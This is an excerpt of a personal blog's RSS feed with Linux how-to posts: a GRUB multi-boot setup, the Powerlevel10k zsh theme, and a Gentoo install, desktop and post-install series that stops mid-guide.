Mastering these commands can help you gain an advantage in CS:GO by streamlining your gameplay and allowing you to focus on what truly matters: outsmarting your opponents. Experiment with these commands in practice games to fine-tune your skills, and you&apos;ll be well on your way to becoming a more formidable CS:GO player.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Creating a Multi-OS Boot Menu with GRUB</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-boot-os-prober-and-efibootmgr/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-boot-os-prober-and-efibootmgr/</guid><description>Learn how to set up a multi-OS boot menu using Grub and os-prober, ensuring hassle-free switching between different operating systems on your computer.</description><pubDate>Sat, 23 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

For those of us who have ventured into the world of dual-boot systems, we know that it can be both a blessing and a headache. While I&apos;ve personally transitioned to GPU passthrough for a smoother multi-system experience, dual-booting remains a practical option for many. In this article, I&apos;ll guide you through setting up a multi-OS boot menu using Grub and os-prober.

### Why? (Fuck Windows)

Windows updates have a knack for causing trouble, especially when it comes to your boot-loader. They can mess up your Grub configuration, leaving you without the familiar boot menu to choose your operating system. In such cases, you&apos;d have to manually access the boot menu to select the system you want to run.

Windows tends to be the culprit here, often disrupting your boot loader, preventing Grub from automatically appearing.

A piece of advice for those planning to install both Windows and Linux: it&apos;s generally smoother to install Windows first and then allocate disk space for Linux. If you install Linux first and then add Windows later, you&apos;ll likely need to reconfigure your Linux boot-loader because, more often than not, Windows will disrupt it.

## Getting Prepared

Before we dive into configuring Grub and os-prober, you should already have both Linux and your other operating system (be it Debian, Arch, or Windows) installed. What you&apos;re missing is the boot loader for both systems.

### Step 1: Install GRUB

Let&apos;s start by installing Grub on your system with this command:

```shell
sudo pacman -S grub
```

### Step 2: Do You Need efibootmgr?

Whether you need to install efibootmgr depends on whether your system uses UEFI. Here&apos;s when you&apos;d want to install it:

- Your system is UEFI-based.
- You&apos;re setting up a dual-boot configuration or managing UEFI boot entries for multiple operating systems.

If these conditions apply to your system, use this command to install efibootmgr:

```shell
sudo pacman -S efibootmgr
```

### Step 3: Install os-prober

To proceed, you need to detect if there are multiple systems on your device. Use the following command to install os-prober:

```shell
sudo pacman -S os-prober
```

### Step 4: Edit Grub Config File

Now that you&apos;ve detected the presence of multiple systems, it&apos;s time to enable Grub to recognize them. By default, Grub doesn&apos;t do this, but you can change that. Use the following command to add a line to your Grub settings:

```shell
echo &apos;GRUB_DISABLE_OS_PROBER=false&apos; &gt;&gt; /etc/default/grub
```

#### Explanation

What does this line do? Normally, Grub doesn&apos;t automatically detect if you have multiple systems. But by adding `GRUB_DISABLE_OS_PROBER=false`, you enable Grub to do just that.

&gt;This step is crucial for adding dual-boot options to your menu.

### Final Step: Adding Boot Options to the Menu

Identify your boot path using the `lsblk` command. For example, if your boot path is `/boot/efi`, use the following command:

```shell
sudo grub-install --target=x86_64-efi --efi-directory=/boot/efi
```

Next, regenerate the configuration with this command:

```shell
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

### Finished!

After completing these steps, reboot your system. You should now see a list of other distributions or operating systems on your Grub menu. Enjoy the convenience of a multi-OS boot menu!

## References

- [Adding Other Operating Systems to the GRUB Bootloader](https://www.baeldung.com/linux/grub-bootloader-add-new-os)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Oh my zsh: Installing Powerlevel10k Theme</title><link>https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install-powerlevel10k-theme/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install-powerlevel10k-theme/</guid><description>Elevate your command-line experience with the Powerlevel10k theme for Oh My Zsh. Follow our step-by-step guide to seamlessly install and customize this powerful theme, making your terminal both visually appealing and highly functional.</description><pubDate>Sat, 23 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Tired of the same old look of your Oh My Zsh terminal? Want something more stylish and functional? Look no further than the Powerlevel10k theme, a specially designed theme for Oh My Zsh that brings beauty and functionality to your terminal.

## Getting Prepared

Before we dive into the installation of Powerlevel10k, make sure you have Oh My Zsh installed on your system. Powerlevel10k is designed as a theme for Oh My Zsh, so having Oh My Zsh is a prerequisite.

### Step 1: Installing Required Fonts

To ensure that Powerlevel10k displays correctly, it&apos;s highly recommended to install the Meslo Nerd Font. This font is officially recommended by both Oh My Zsh and Powerlevel10k for the best visual experience. Without it, some text or icons may not display correctly in your terminal.

Choose the font style that suits your preferences:

- [MesloLGS NF Regular.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS NF Regular.ttf)
- [MesloLGS NF Bold.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS NF Bold.ttf)
- [MesloLGS NF Italic.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS NF Italic.ttf)
- [MesloLGS NF Bold Italic.ttf](https://github.com/romkatv/powerlevel10k-media/raw/master/MesloLGS NF Bold Italic.ttf)

### Step 2: Configuring Your Terminal Fonts

Configuring fonts in your terminal depends on the terminal emulator you are using. Each terminal emulator has different options and locations for font settings. In general, you need to access your terminal&apos;s settings and select the specific font you downloaded (Meslo Nerd Font) to ensure it&apos;s displayed correctly. (As shown in the image below):

![fonts](./fonts.png)

### Step 3: Installing Powerlevel10k for Oh My Zsh

Installing Powerlevel10k is a breeze, and it only requires two simple commands. Here&apos;s how you can do it:

1. Powerlevel10k provides a convenient installation script. Copy and paste the following commands into your terminal to install Powerlevel10k:

```shell
git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ~/powerlevel10k
echo &apos;source ~/powerlevel10k/powerlevel10k.zsh-theme&apos; &gt;&gt; ~/.zshrc
```

2. After executing these commands, it&apos;s time to give your terminal a quick refresh. Restart your terminal session.

3. When you launch your terminal again, you&apos;ll be greeted with the Powerlevel10k configuration wizard. This interactive wizard makes it easy to customize your Powerlevel10k theme to your liking. You can make choices by selecting options with number keys and confirming them with y/n responses.

4. Once you&apos;ve completed the configuration wizard, your Powerlevel10k theme will be ready to roll!

With just a few simple steps, you&apos;ll have Powerlevel10k up and running, enhancing the look and functionality of your Oh My Zsh terminal. Enjoy your newly customized and powerful terminal experience!

## Updating Powerlevel10k

To keep your Powerlevel10k theme up to date, you can easily pull the latest updates using Git. Run the following command:

```shell
git -C ~/powerlevel10k pull
```

## Optional: Displaying Shortened Paths

If you find the display of the full path in your terminal too lengthy and prefer a shorter representation, you can configure Powerlevel10k to display only the last part of the path. Here&apos;s how:

1. Edit the `p10k.zsh` file:

```shell
vim ~/.p10k.zsh
```

2. In the Vim editor, search for the text `POWERLEVEL9K_SHORTEN_STRATEGY` by typing `/`.

3. Change the value of this parameter to `truncate_to_last`.

4. Save the changes and exit the editor.

5. Restart your terminal to see the updated path display.

With these steps, you&apos;ll have successfully enhanced your Oh My Zsh experience with the visually appealing and feature-rich Powerlevel10k theme. Enjoy your customized and powerful terminal!

## Conclusion

Congratulations! You&apos;ve successfully transformed your Oh My Zsh terminal into a powerful and beautifully customized environment with the Powerlevel10k theme. This elegant theme not only enhances the aesthetics of your terminal but also provides useful features and configurations for a more efficient workflow.

By following the steps in this guide, you&apos;ve achieved the following:

1. **Installed Meslo Nerd Fonts:** Ensured that your terminal can display icons and text correctly by installing the recommended Meslo Nerd Fonts.

2. **Set Up Terminal Fonts:** Configured your terminal to use the Meslo Nerd Font you installed, making sure everything looks as intended.

3. **Installed Powerlevel10k:** Installed the Powerlevel10k theme with a simple script and customized it during the setup process, tailoring it to your preferences.

4. **Optional: Shortened Path Display:** Learned how to shorten the display of the current directory in your terminal for a cleaner and more efficient prompt.

Now, your terminal not only looks great but is also a powerful tool that can boost your productivity. You can use it for coding, system administration, or any other tasks with ease.

## References

- [Github: Powerlevel10k](https://github.com/romkatv/powerlevel10k)
- [zsh: Customizing Powerleve10k prompt](https://stackoverflow.com/questions/61176257/customizing-powerleve10k-prompt)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Comprehensive Guide to Gentoo Linux: Installing XORG, XFCE and LightDM with OpenRC</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-install-xfce-xorg-lightdm/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-install-xfce-xorg-lightdm/</guid><description>Gentoo Linux of installing XORG, XFCE and LightDM with the OpenRC init system. Dive into the realm of open-source customization and create a powerful and tailored desktop environment on your Gentoo system.</description><pubDate>Wed, 20 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In our previous blog, we successfully installed Gentoo Linux and set up the system on our disk. However, at this point, our system lacks a graphical user interface (GUI), making it necessary to install a Desktop Environment (DE) to provide a more user-friendly experience. In this guide, we will walk you through the process of installing the XFCE DE on your Gentoo system using OpenRC as the init system.

### Why Choose XFCE?

XFCE is an excellent choice for those seeking a lightweight and efficient desktop environment. Unlike resource-intensive alternatives like GNOME or KDE, XFCE is incredibly light on system resources, requiring less than 200MB of RAM to run smoothly. Its minimalistic design and efficient performance make it ideal for older hardware or users who prefer a snappy and responsive desktop experience. Additionally, XFCE has shorter compilation times during the installation process, making it an attractive option for Gentoo users. Let&apos;s dive into the installation process and get XFCE up and running on your Gentoo Linux system.

## Step 0: Update Your System

Before diving into the XFCE installation, it&apos;s crucial to ensure that your Gentoo system is up to date with the latest package information. You can achieve this by running the following commands:

```bash
sudo emerge --sync
sudo emerge --ask --update --deep --newuse @world
```

### Step 1: Adjust Your `make.conf`

Gentoo&apos;s strength lies in its USE flags, which allow us to fine-tune package compilation to meet our specific requirements. To get XFCE up and running, we need to enable specific USE flags.

```shell
nano /etc/portage/make.conf
```

Add the following lines to your `make.conf`:

```shell
USE=&quot;X elogind dbus&quot;
INPUT_DEVICES=&quot;libinput&quot;
VIDEO_CARDS=&quot;qxl&quot;
```

These flags enable X support, integrate elogind for session management, and set up D-Bus communication. They also configure input devices to use libinput and specify video cards to support QXL.

### Step 2: Configure elogind to Start on Boot

Elogind is essential for session management in XFCE. Ensure that it starts automatically during boot:

```shell
rc-update add elogind boot
```

### Step 3: Ensuring Graphics Driver Compatibility

Before we dive into the XFCE installation, it&apos;s vital to confirm that our system has the requisite graphics drivers in place. This step helps us avoid potential issues and ensures a smooth XFCE installation.

Run the following command to perform a dry run and simulate the installation of essential graphics drivers:

```shell
emerge --pretend --verbose --ask x11-base/xorg-drivers
```

&gt;Tips: This command meticulously checks and confirms that we have the necessary graphics drivers ready to support XFCE. Ensuring the compatibility of these drivers is paramount to a successful XFCE setup.

Now, let&apos;s proceed confidently, knowing that our system is well-prepared for the XFCE installation journey.

### Step 4: Declutter for a Pristine System

A well-maintained system is a happy system. It&apos;s time to declutter your Gentoo environment and bid farewell to any unnecessary packages. This not only keeps your system running smoothly but also frees up precious space.

Let&apos;s get started with the cleanup:

```shell
emerge --ask --depclean --verbose
```

&gt; **Tips:** While this step might not always be mandatory, it&apos;s a good practice to keep your system tidy and avoid any potential errors down the road. Plus, who doesn&apos;t love a clean and efficient system? 😉🌟

### Step 5: Fine-Tune Poppler Settings

To ensure compatibility and prevent conflicts, we&apos;ll instruct the Poppler library not to use Qt5:

```shell
echo &quot;app-text/poppler -qt5&quot; &gt; /etc/portage/package.use/poppler
```

### Step 6: Manual Configuration for libdbusmenu

In some cases, manual configuration is necessary, and libdbusmenu is no exception. Let&apos;s ensure libdbusmenu is properly set up:

Please note that over time, the required version may change. (At this time is `v16.09.0-r2`)If you encounter any issues, run the installation command once, and the terminal will provide prompts with the necessary commands to echo. Simply follow the prompts to resolve any version-related discrepancies.

Run the following command to set up libdbusmenu with the appropriate configuration:

```shell
echo &quot;&gt;=dev-libs/libdbusmenu-16.04.0-r2 gtk3&quot; &gt; /etc/portage/package.use/libdbusmenu
```

With these steps complete, your Gentoo system is now primed and ready to welcome the XFCE desktop environment.

## Gentoo: Installing XFCE

Now comes the exciting part—installing XFCE, XORG and LightDM on your Gentoo system.

### Step 7: Installing XFCE

Execute the following command to install XFCE:

```shell
emerge --ask --verbose xfce-base/xfce4-meta
```

This command installs the XFCE meta-package, which includes all the core components of the XFCE desktop environment. It ensures that you have a complete XFCE experience with all the necessary applications and utilities.

### Step 8: Don&apos;t Forget the Terminal

In the world of Linux, the terminal is your trusty companion, your guiding star through the vast universe of commands and tasks. Just like having hands and feet, you can&apos;t navigate Linux comfortably without it. So, let&apos;s make sure you have your terminal ready for action!

&gt;Just skip this part, no need to be installed, xfce4-meta is already included.

```shell
emerge --ask --verbose x11-terms/xfce4-terminal
```

### Step 9: Configuring Your XFCE Session

Before we dive into your XFCE desktop, let&apos;s ensure that your system knows how to start it. We&apos;ll create a command to initiate XFCE.

```shell
echo &quot;exec startxfce4&quot; &gt; ~/.xinitrc
```

Alternatively, if you prefer a quicker way, you can directly enter this command:

```shell
exec startxfce4
```

With this configuration in place, you&apos;re all set to experience the XFCE desktop environment. Simply execute the command, and you&apos;ll be greeted by the XFCE screen on your system. Enjoy the XFCE experience tailored to your liking!

#### Testing Launching XFCE

With everything set up and ready, it&apos;s time to test your Configuring XFCE on your Gentoo system. When you log in to your user account, simply type the following command to start your XFCE session:

```shell
startx
```

And there you have it—your Gentoo system has DE installed (As shown in the image below):

![Started XFCE](./Gentoo-xfce-start.png)

## Step 10: Creating a Normal User

Before we proceed with the installation of LightDM for XFCE, it&apos;s essential to create a dedicated normal user. By default, LightDM does not permit root user login, so having a normal user is necessary. Additionally, it&apos;s not recommended to perform everyday tasks as the root user for security reasons. Here&apos;s a quick guide on creating a normal user:

```shell
# Create a new user with necessary group memberships and set the shell to /bin/bash
useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;
```

- `useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;`: This command creates a new user account with the specified `&lt;username&gt;` and assigns it to essential groups, including &quot;users,&quot; &quot;wheel,&quot; and &quot;audio.&quot; The `-m` flag ensures a home directory is created for the user, and the `-s /bin/bash` flag sets the user&apos;s default shell to `/bin/bash`.

Next, set the user&apos;s password:

```shell
passwd &lt;username&gt;
```

## Step 11: Installing LightDM Display Manager

If you&apos;ve noticed that some essential functions, such as power off or logout, are not working in your XFCE environment, it&apos;s likely due to the absence of a Display Manager. For XFCE, LightDM is a highly recommended Display Manager. Follow these steps to install it:

```shell
emerge --ask x11-misc/lightdm
```

### Step 12: Edit the `display-manager` File

Now, let&apos;s configure LightDM as the default Display Manager. Open the `display-manager` file and check its content. set the value to `lightdm`:

```shell
nano /etc/conf.d/display-manager
```

The file should look like this:

```shell
DISPLAYMANAGER=&quot;lightdm&quot;
```

### Step 13: Start LightDM on Boot

To ensure LightDM starts automatically with your system, add both `dbus` and `display-manager` to the default runlevel. The `dbus` service is essential as LightDM depends on it for passing messages:

```shell
rc-update add dbus default
rc-update add display-manager default
```

### Step 14: Start LightDM

It&apos;s time to start LightDM:

```shell
rc-service dbus start
rc-service display-manager start
```

Once LightDM is successfully started, your system should look similar to the image below:

![lightdm](./LightDM-start.png)

## Accessing Terminal in TTY Mode

In some cases, you might encounter issues logging into your desktop session or accessing the terminal from within the desktop environment. Here&apos;s a quick workaround to access the terminal using TTY (Teletype) mode:

1. Press the following key combination to access TTY mode:

   ```shell
   Ctrl + Alt + F1
   ```

   This key combination will take you to the first virtual terminal (TTY1).

2. In the TTY1 terminal, you can create your user account if needed or perform other tasks as necessary. To create a user account, you can follow the steps mentioned in a previous section.

3. Once you&apos;ve completed your tasks in TTY1, you can return to your desktop environment by pressing the following key combination:

   ```shell
   logout
   ```

   or

   ```shell
   exit
   ```

   This will take you back to your graphical desktop session.

Using TTY mode provides an alternative way to access your system and perform tasks when you encounter issues within your desktop environment.

## What Comes After?

Congratulations! You&apos;ve successfully set up your Gentoo system and are now equipped with a powerful foundation for your Linux journey. However, this isn&apos;t the end; it&apos;s just the beginning.

For a detailed guide on these post-installation steps, check out [this link](/en/blog/linux/gentoo/gentoo-post-installation/) to take your Gentoo experience to the next level.

## References

- [Gentoo: Xorg/Guide](https://wiki.gentoo.org/wiki/Xorg/Guide)
- [Gentoo: Xfce](https://wiki.gentoo.org/wiki/Xfce)
- [Gentoo: Firefox](https://wiki.gentoo.org/wiki/Firefox)
- [Gentoo: LightDM](https://wiki.gentoo.org/wiki/LightDM)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Enhancing Your Gentoo Linux Installation: Post-Installation</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-post-installation/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-post-installation/</guid><description>Take your Gentoo Linux system to the next level with user management, sudo, system logging, NTP time synchronization, CPU optimization, Neofetch, Wi-Fi support. and Others.</description><pubDate>Wed, 20 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In our previous article, we accomplished the installation of XFCE with XORG, setting the stage for a functional Gentoo Linux system. Now, as we delve into this comprehensive post-installation guide, we&apos;ll lead you through pivotal steps aimed at elevating the security, functionality, and performance of your Gentoo setup. By the time we wrap up, you&apos;ll have a fully operational Gentoo Linux system tailored to meet your daily computing needs.

## User Management

During the installation process, you primarily used the root account for configuration tasks. However, for improved security and easier system management, it&apos;s essential to create a dedicated user account for everyday use.

In addition, As a long-time Linux user, I don’t think there is any need to explain why it is necessary to use normal user as your daily account.

### Create a User Account

Follow these steps to create a new user account. Replace `&lt;username&gt;` with your desired username:

```bash
# Create a new user with necessary group memberships and set the shell to /bin/bash
useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;
```

- `useradd -m -G users,wheel,audio -s /bin/bash &lt;username&gt;`: This command creates a new user account with the specified username (`&lt;username&gt;`) and assigns it to essential groups, including &quot;users,&quot; &quot;wheel,&quot; and &quot;audio.&quot; The `-m` flag ensures a home directory is created for the user, and the `-s /bin/bash` flag sets the user&apos;s default shell to `/bin/bash`.

Next, set the user&apos;s password:

```shell
passwd &lt;username&gt;
```

After completing this step, you have a complete daily user. However, you do n’t have to wait when you need to enter the instructions after each sudo. The time is 0 seconds.

### Switch to the New User

To complete the user setup and start using your new user account, switch to the newly created user with the following command:

```bash
# Switch to the newly created user
su - &lt;username&gt;
```

So that you can switch your current user with `su` command.

### 2. Installing `sudo` for Administrative Tasks

It’s really troublesome without the sudo tool, so it must be installed. By default, Gentoo doesn&apos;t include `sudo`. However, `sudo` is invaluable for performing administrative tasks with elevated privileges. To install `sudo`, use this command:

```bash
emerge --ask --verbose sudo
```

This command installs `sudo` on your system, allowing you to execute administrative commands securely. With `sudo`, you can perform tasks like package management and system configuration without needing to log in as the root user.

### Configure `sudo` Access

To configure `sudo` access for your new user, follow these steps:

```bash
visudo
```

- `visudo`: Use this command to safely edit the sudoers file, which controls who has access to administrative privileges via `sudo`.

Within the sudoers file, locate the line `%wheel ALL=(ALL) ALL` and uncomment it by removing the `#` symbol at the beginning of the line. This action allows users in the &quot;wheel&quot; group to execute commands with sudo privileges:

```bash
# Uncomment the line below to allow users in the wheel group to execute commands with sudo privileges
%wheel ALL=(ALL) ALL
```

It&apos;s also recommended to set a flag `Defaults timestamp_timeout=0` in the sudoers file. This configuration removes the delay when entering the sudo password:

```bash
Defaults timestamp_timeout=0
```

After completing these steps, you have a fully functional user account with sudo privileges. The timeout for password entry when using `sudo` is set to 0 seconds, providing an extra layer of security for your system.

## Useful tools

As you finalize your Gentoo Linux installation, consider adding essential packages to enhance your system&apos;s functionality and convenience.

### 1. Install `sysklogd` for System Logging

System logging is crucial for keeping track of system events and activities. `sysklogd` is a reliable tool for managing system logs. To install it, run the following command:

```bash
emerge --ask app-admin/sysklogd
```

After installation, add `sysklogd` to the list of services that start automatically at boot with the following command:

```bash
rc-update add sysklogd default
```

By doing this, `sysklogd` will begin capturing log messages from the early stages of system startup, providing you with a comprehensive record of system events.

### 2. Install `chrony` for Time Synchronization

Accurate timekeeping is crucial for various system functions and services. `chrony` is a reliable tool for time synchronization. To install it, use the following command:

```bash
emerge --ask net-misc/chrony
```

Once `chrony` is installed, add it to the startup services to ensure that your system&apos;s time stays accurate:

```bash
rc-update add chronyd default
```

`chronyd` will synchronize your system&apos;s time with time servers on the internet, helping to maintain accurate time for various system operations.

### 3. Install `wireless-tools` for Wi-Fi Management (Optional)

If you use Wi-Fi for your network connection, installing `wireless-tools` can be helpful for managing wireless networking. However, if you prefer using a wired LAN connection or don&apos;t need Wi-Fi support, you can skip this step.

To install `wireless-tools`, use the following command:

```bash
emerge -av wireless-tools
```

### 4. Install `CPUID2CPUFLAGS` for CPU Optimization

Optimizing software performance for your specific CPU architecture is essential for getting the most out of your hardware. The CPUID2CPUFLAGS utility helps identify CPU-specific flags, which are crucial for compiling software tailored to your CPU. To install it, use this command:

```shell
emerge --ask app-portage/cpuid2cpuflags
```

After installation, run the following command to determine the CPU flags specific to your system:

```shell
cpuid2cpuflags
```

This utility detects your CPU&apos;s capabilities and outputs the appropriate flags. These flags will be used during package compilation to ensure optimized performance.

To configure Gentoo to use these CPU flags for all packages, create a file named `00cpu-flags` in the `/etc/portage/package.use/` directory:

```shell
echo &quot;*/* $(cpuid2cpuflags)&quot; &gt; /etc/portage/package.use/00cpu-flags
```

This file specifies the CPU flags for all packages, ensuring that software is compiled to take full advantage of your CPU&apos;s capabilities.

### 5. Install `neofetch` for System Information

`neofetch` is a handy utility that provides detailed information about your Gentoo system in a visually appealing way. To install `neofetch`, use the following command:

```bash
emerge -av neofetch
```

Once installed, you can run `neofetch` to quickly view system information, including your distribution, kernel version, CPU, memory, and more. It&apos;s a useful tool for getting an overview of your system&apos;s configuration.

![neofetch](./neofetch.png)

### 6. Install Gentoolkit

To assist in managing your Gentoo system and packages, installing Gentoolkit is a wise choice. Gentoolkit provides various helpful utilities for package management and system analysis. You can install it using the following command:

```shell
emerge --ask --verbose app-portage/gentoolkit
```

Once installed, you can leverage Gentoolkit to perform various tasks, including searching for package information, checking for reverse dependencies, and more. For instance, if you want to find out which packages depend on `www-client/firefox`, you can use the `equery` utility as follows:

```shell
equery uses www-client/firefox
```

This command will provide you with a list of packages that reference or rely on `www-client/firefox` in your Gentoo system.

### 7. Install Firefox

Certain packages may require manual configuration to ensure compatibility and functionality. One such example is configuring `alsa-plugins` for Firefox. The required version of `alsa-plugins` may change over time, so it&apos;s essential to follow the prompts during the installation process.

#### Manual Configuration for Firefox

To set up `alsa-plugins` with the correct version for Firefox, use the following command:

```shell
echo &quot;&gt;=media-plugins/alsa-plugins-1.2.7.1-r1 pulseaudio&quot; &gt; /etc/portage/package.use/alsa-plugins
```

This command specifies the version and configuration for `alsa-plugins` to work seamlessly with Firefox. If the version changes in the future, running the installation command again will prompt you with the updated version, allowing you to input the correct information.

#### Proceed to Install Firefox

Now, you can proceed to install Firefox. Gentoo offers two options: building it from source or installing a pre-built binary version. Here are the commands for both options:

To build Firefox from source:

```shell
emerge --ask --verbose www-client/firefox
```

To install the pre-built binary version:

```shell
emerge --ask --verbose www-client/firefox-bin
```

#### Launching Firefox

Once Firefox is installed, you can easily launch it by typing the following command in your terminal:

For the source-built Firefox:

```shell
firefox
```

For the pre-built binary version of Firefox:

```shell
firefox-bin
```

By following these steps, you&apos;ll have a fully configured Firefox web browser on your Gentoo system, ready for all your browsing needs.

## 8. Setting Up Time Synchronization with Chrony

Ensuring accurate time synchronization is crucial for the proper functioning of your Gentoo system. The NTP (Network Time Protocol) protocol is commonly used for this purpose, and one popular software implementation is Chrony. Here&apos;s how you can set up Chrony for time synchronization:

### Installing Chrony

First, install Chrony using the following command:

```bash
emerge --ask net-misc/chrony
```

### Adding Chrony to System Startup

To make sure Chrony starts automatically during boot, add it to the default runlevel with this command:

```bash
rc-update add chronyd default
```

By adding Chrony to the default runlevel, you ensure that it initializes with your system every time it boots up.

Chrony offers accurate time synchronization, crucial for various system processes and network activities. Setting it up correctly contributes to the overall stability and reliability of your Gentoo system.

## 9. Network Connectivity with NetworkManager

NetworkManager is a versatile software crafted to efficiently manage an array of network connections, including wired, wireless, DSL, dial-up, VPN, WiMAX, and mobile broadband networks.

### Installation

For a seamless network management experience, install NetworkManager using the following command in your shell:

```shell
sudo emerge --ask --verbose net-misc/networkmanager
```

### Autostart at Boot

Ensure NetworkManager starts automatically at boot by adding it to the default run level with the following command:

```shell
rc-update add NetworkManager default
```

Whether you need standard wired and wireless connections or desire to set up custom networks like WireGuard or OpenVPN, NetworkManager provides a user-friendly platform for configuring and managing diverse network environments.

## Summarize

These tools are useful for your daily use of gentoo. Installation is not required, but they will definitely help your future work or experience.

## References

- [Gentoo: Finalizing](https://wiki.gentoo.org/wiki/Handbook:AMD64/Installation/Finalizing)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Comprehensive Guide to Installing Gentoo Linux with OpenRC</title><link>https://ummit.dev//posts/linux/distribution/gentoo/gentoo-ultimate-installation-tutorial/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/gentoo/gentoo-ultimate-installation-tutorial/</guid><description>Explore this in-depth guide to installing Gentoo Linux using OpenRC, focusing on Linux installation without Windows and Desktop Environments (DE).</description><pubDate>Sat, 16 Sep 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Gentoo Linux is a distribution known for its flexibility, performance, and robustness. In this comprehensive guide, we will walk you through the process of installing Gentoo Linux step by step. By the end of this tutorial, you will have a fully functional Gentoo Linux system ready for your customization.

&gt;Notes: This article has only the most basic settings.

## Prerequisites

Before embarking on the exciting journey of installing Gentoo Linux, it&apos;s essential to ensure you have everything you need:

- **Linux Proficiency:** You should be comfortable with Linux, know How linux working. and have experience with tasks like installing Arch Linux. While Gentoo is known for its flexibility, don&apos;t know how the command working, otherwise the installation will be very painful. I think it will take at least one week to several weeks to install..

- **Stable Internet Connection:** Gentoo requires downloading various packages and the Stage3 tarball during installation. Ensure you have a reliable and reasonably fast internet connection to expedite this process.

- **Hardware or Virtual Machine:** Prepare a physical machine or set up a virtual machine (VM) where you intend to install Gentoo. Whether it&apos;s real hardware or a virtual environment, Gentoo can adapt to your choice.

- **CPU cores:** There are many CPU cores. You need to know that everything in Gentoo is built using source code and not pre-built, so the cpu is very important as it depends on the compilation speed of your computer.

Now, let&apos;s get started with the installation process:

1. **Visit the Official Gentoo Website:** Open your web browser and navigate to [gentoo.org](https://www.gentoo.org/).

![Download ISO](./Download-iso.png)

2. **Download the Minimal Installation CD:** On the Gentoo download page, locate the &quot;Minimal Installation CD (amd64)&quot; option and click to initiate the download of the Gentoo ISO image.

With these prerequisites addressed,  Lets Boot your ISO on your machine!

## Step 1: Initial Setup

Before delving into the installation process, there are a few critical preliminary steps to ensure a smooth Gentoo Linux installation:

### Choose Keyboard Layout

As you boot up the Gentoo Linux ISO, your first decision is to select the appropriate keyboard layout. The default setting is a US keyboard layout. To confirm this choice, simply press Enter.

### Verify Internet Connectivity
```shell
ping gentoo.org
```
To begin the Gentoo installation, it&apos;s crucial to confirm that you have a working internet connection. You can quickly check this by running the following command. A successful response indicates that your network connection is functional and ready for the installation process.

### List Available Block Devices
```shell
lsblk
```
To proceed with the installation, you need to identify the specific storage device where you&apos;ll install Gentoo. The `lsblk` command provides a comprehensive list of available block devices on your system. Take note of the device you intend to use for the Gentoo installation.

### Initialize GPT Partition Table

Now, let&apos;s initialize the GUID Partition Table (GPT) on your chosen device:

```shell
gdisk /dev/vda
```

Once inside the `gdisk` utility, follow these steps:

1. Type &quot;o&quot; to create a new GPT partition table. Please note that this action will erase all existing data on the selected device.

2. Press &quot;n&quot; to create a new partition. Specify the partition type as &quot;ef00&quot; (EFI system partition) and allocate a size of at least +1G. This partition is essential for EFI booting.

3. Use &quot;n&quot; once more to create another partition. Search for &quot;swap&quot; by specifying the code &quot;8200&quot; and allocate at least +10G in size for the swap partition.

4. Again, press &quot;n&quot; to create a partition. This time, allocate the remaining space for it. This partition will serve as the root filesystem.

5. Confirm the partition table by typing &quot;p&quot; to review its contents. Ensure that all partitions have been created correctly.

6. If everything appears as expected, save your changes by typing &quot;w.&quot; This action will write the new partition table to all partitions.

When defining partition sizes during GPT initialization, the `+` notation allows you to add space to the existing size.

Upon completion, your partition layout should resemble the following example (based on my configuration):

| Number   | Size                 | Code | Name                 |
|----------|----------------------|------|----------------------|
| 1 (vda1) | +1G (1024.0MiB)      | ef00 | EFI system partition |
| 2 (vda2) | +10G (9.0 GiB)      | 8200 | Linux swap           |
| 3 (vda3) | All Remaining Space (90.0 GiB) | 8300 | Linux filesystem     |

This sets the stage for the partitioning of your device to host the Gentoo Linux installation.

## Step 2: Partitioning

In this step, you will create and format the necessary partitions for your Gentoo installation. These partitions will serve distinct roles, including EFI booting, housing the core filesystem, and providing swap space.

### Format EFI Partition

To ensure your system supports EFI booting, the EFI partition needs to be correctly formatted with the FAT32 file system. Use the following command:

```shell
mkfs.fat -F32 /dev/vda1
```

This command prepares the EFI partition (/dev/vda1) with the FAT32 file system, a requirement for EFI-based booting.

### Format Root Partition

The root partition is where the core Gentoo filesystem will reside. Format it with the Btrfs file system using this command:

```shell
mkfs.btrfs /dev/vda3
```

By running this command, you&apos;re configuring the root partition (/dev/vda3) with the Btrfs file system, a modern and flexible choice for managing your Gentoo installation.

### Create Swap Partition

Swap space is essential for memory management in your system. Begin by initializing the swap partition with this command:

```shell
mkswap /dev/vda2
```

This command prepares the swap partition (/dev/vda2) for use in your Gentoo system.

### Enable Swap

Activate the swap partition to make it available for use in your system:

```shell
swapon /dev/vda2
```

This step ensures that your Gentoo installation can effectively manage system memory.

### Create a Mount Point

Before proceeding, create the required directory structure for your Gentoo filesystem:

```shell
mkdir --parents /mnt/gentoo
```

This command establishes the necessary directory structure within the `/mnt` directory, specifically the `/mnt/gentoo` directory, which will serve as the mount point for your Gentoo installation.

### Mount the Root Partition

